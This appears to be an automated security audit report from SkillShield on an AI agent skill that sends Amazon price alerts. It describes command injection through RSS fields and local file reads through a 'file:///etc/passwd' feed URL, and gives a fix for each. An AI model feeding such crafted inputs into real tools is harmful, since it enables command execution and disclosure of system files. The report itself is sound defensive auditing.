Trust Assessment
camelcamelcamel-alerts received a trust score of 73/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 0 critical, 1 high, 2 medium, and 0 low severity. Key findings include Suspicious import: urllib.request, Local file disclosure via unvalidated RSS feed URL, Command injection risk via unsanitized output for downstream execution.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Command injection risk via unsanitized output for downstream execution The `scripts/notify.sh` script constructs a message string using `title`, `description`, and `link` variables, which are derived from untrusted RSS feed content. This message, along with `title` and `link`, is then outputted in the format `ALERT|$title|$message|$link`. The `SKILL.md` indicates this output is "piped to message action" (Clawbot's message tool). If the downstream message tool executes any part of this output (e.g., the `link` or `message` content) as a shell command without proper sanitization, a malicious actor could inject commands by crafting specific content in their RSS feed items. For example, a crafted `link` could contain shell metacharacters like `$(command)` or backticks, leading to command injection. The `notify.sh` script should sanitize all user-controlled variables (`title`, `description`, `link`) by escaping shell metacharacters before they are interpolated into the `message` string and outputted. Alternatively, the downstream "message tool" must guarantee robust sanitization or use a safer method of receiving parameters (e.g., structured data instead of raw strings for shell execution). | LLM | scripts/notify.sh:24 | |
| MEDIUM | Suspicious import: urllib.request Import of 'urllib.request' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/jgramajo4/camelcamelcamel-alerts/scripts/fetch_rss.py:11 | |
| MEDIUM | Local file disclosure via unvalidated RSS feed URL The `scripts/fetch_rss.py` script takes the `feed_url` directly from `sys.argv[1]` without any validation. The `urllib.request.urlopen` function supports the `file://` protocol, allowing a malicious user to provide a `feed_url` like `file:///etc/passwd` to attempt to read arbitrary local files. While the script expects XML content, the ability to read local files is a security concern, and if the file content happens to be valid XML, it would be parsed and potentially exfiltrated via the script's JSON output. Implement strict validation for the `feed_url` to ensure it only points to `https://camelcamelcamel.com` or at least restricts allowed protocols to `http` and `https` and explicitly prevents `file://` access. | LLM | scripts/fetch_rss.py:40 |
Scan History
Embed Code
[](https://skillshield.io/report/7dededf8c0d36791)
Powered by SkillShield